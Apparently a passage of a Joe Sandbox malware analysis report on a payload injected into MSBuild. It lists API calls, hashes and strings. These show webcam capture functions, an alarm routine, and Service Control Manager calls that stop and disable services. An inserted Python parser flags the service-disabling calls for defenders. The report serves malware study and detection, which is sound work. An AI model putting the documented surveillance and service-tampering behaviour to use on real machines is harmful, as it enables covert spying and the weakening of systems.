                                                                                                                                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll$u;~/
                                                                                                                                            • API String ID: 4061214504-2777637902
                                                                                                                                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                            • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                                                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                            • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                                                            • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                            • String ID: Alarm triggered$`v
                                                                                                                                            • API String ID: 614609389-3040121899
                                                                                                                                            • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                                                            • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                                                            • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                                                            • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                                                            APIs
                                                                                                                                            • __allrem.LIBCMT ref: 00439789
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                                                            • __allrem.LIBCMT ref: 004397BC
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                                                            • __allrem.LIBCMT ref: 004397F1
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                            • Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                                                            • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                                                            • Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                                                            • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                            • __freea.LIBCMT ref: 10008A08
                                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                            • __freea.LIBCMT ref: 10008A11
                                                                                                                                            • __freea.LIBCMT ref: 10008A36
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                            • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                            • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                            • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                            • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __cftoe
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4189289331-0
                                                                                                                                            • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                                            • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                                                            • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                                            • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prologSleep
                                                                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                                                            • API String ID: 3469354165-462540288
                                                                                                                                            • Opcode ID: 74b81fa96e7e5076f3accc36f300641f5859c8e4b9fb844b7f267ff1e29a7abd
                                                                                                                                            • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                                                            • Opcode Fuzzy Hash: 74b81fa96e7e5076f3accc36f300641f5859c8e4b9fb844b7f267ff1e29a7abd
                                                                                                                                            • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                                                            APIs
                                                                                                                                            • _strlen.LIBCMT ref: 10001607
                                                                                                                                            • _strcat.LIBCMT ref: 1000161D
                                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1922816806-0
                                                                                                                                            • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                            • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                            • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                            • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                            APIs
                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3594823470-0
                                                                                                                                            • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                            • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                            • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                            • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                            APIs
                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 493672254-0
                                                                                                                                            • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                                            • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                                                            • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                                            • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
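The service-configuration function above (OpenSCManagerW, OpenServiceW opened with access 0x2, then ChangeServiceConfigW with dwStartType 4) is the listing's evidence that the injected MSBuild payload reconfigures a service to SERVICE_DISABLED. The following is an added example, not Joe Sandbox code and not code from the sample: a parser for the report's "APIs" bullet lines that recovers the static arguments the report prints and decodes the service-control constants. The sample listing is constructed from lines on this page (one "Part of subcall" line and one LIBCMT line are included to exercise the parser); the constant names are the documented Win32 ones, and treating the 000000FF shown for dwServiceType/dwErrorControl as SERVICE_NO_CHANGE is an assumption stated in the code.

```python
"""Parse Joe Sandbox "APIs" lines and flag service-configuration tampering.

Added example for this report; it is not Joe Sandbox code. It reads the
bullet lines printed under each function's "APIs" heading, recovers the
static arguments the report shows, and decodes the ChangeServiceConfigW
call: dwStartType 4 is SERVICE_DISABLED.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: API lines copied from the function listings on this page
# (one "Part of subcall" line and one LIBCMT line added to exercise the parser).
SAMPLE_LISTING = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
• __allrem.LIBCMT ref: 00439789
"""

# "• Name.MODULE(arg,arg,...), ref: ADDR" or "• Name.MODULE ref: ADDR"; the
# optional "Part of subcall function ADDR:" prefix names the calling function.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # None where the report printed "?"
    ref: int
    caller: Optional[int] = None


def parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module"),
            args=[parse_arg(t) for t in raw.split(",")] if raw else [],
            ref=int(m.group("ref"), 16),
            caller=int(m.group("caller"), 16) if m.group("caller") else None,
        ))
    return calls


SERVICE_NO_CHANGE = 0xFFFFFFFF
SERVICE_CHANGE_CONFIG = 0x0002           # access right needed on the service handle
START_TYPES = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START",
               2: "SERVICE_AUTO_START", 3: "SERVICE_DEMAND_START",
               4: "SERVICE_DISABLED"}


def describe_no_change_or(table: dict, value: Optional[int]) -> str:
    if value is None:
        return "unknown"
    # Assumption: the report shows 000000FF for dwServiceType/dwErrorControl
    # because its static argument recovery took the byte of "push -1"
    # literally; treat 0xFF and 0xFFFFFFFF alike as SERVICE_NO_CHANGE.
    if value in (SERVICE_NO_CHANGE, 0xFF):
        return "SERVICE_NO_CHANGE"
    return table.get(value, f"0x{value:08X}")


def find_service_tampering(calls: List[ApiCall]) -> List[dict]:
    findings = []
    for c in calls:
        if (c.name == "OpenServiceW" and len(c.args) >= 3
                and c.args[2] is not None and c.args[2] & SERVICE_CHANGE_CONFIG):
            findings.append({"api": c.name, "ref": c.ref,
                             "access": "SERVICE_CHANGE_CONFIG"})
        elif c.name == "ChangeServiceConfigW" and len(c.args) >= 4:
            findings.append({
                "api": c.name, "ref": c.ref,
                "service_type": describe_no_change_or({}, c.args[1]),
                "start_type": describe_no_change_or(START_TYPES, c.args[2]),
                "error_control": describe_no_change_or({}, c.args[3]),
            })
    return findings


if __name__ == "__main__":
    for finding in find_service_tampering(parse_listing(SAMPLE_LISTING)):
        print(finding)
```

Run against the listing above, the parser yields seven calls and two findings: the OpenServiceW at 00419E10 requests SERVICE_CHANGE_CONFIG, and the ChangeServiceConfigW at 00419E52 leaves type and error control unchanged while setting the start type to SERVICE_DISABLED. The same parser can be pointed at any other "APIs" block on the page; only the decoding tables are specific to the service-control calls.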
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                            • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                            • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                            • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
APIs
• GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
• SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
• Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
• Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
• Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
APIs
• GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
• _free.LIBCMT ref: 10005B2D
• _free.LIBCMT ref: 10005B55
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
• _abort.LIBCMT ref: 10005B74
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
• Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
• Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
• Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
APIs
• GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
• _free.LIBCMT ref: 00446EF6
• _free.LIBCMT ref: 00446F1E
• SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
• _abort.LIBCMT ref: 00446F3D
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
• Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
• Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
• Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
• Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
• Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
• Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
• Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
• Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
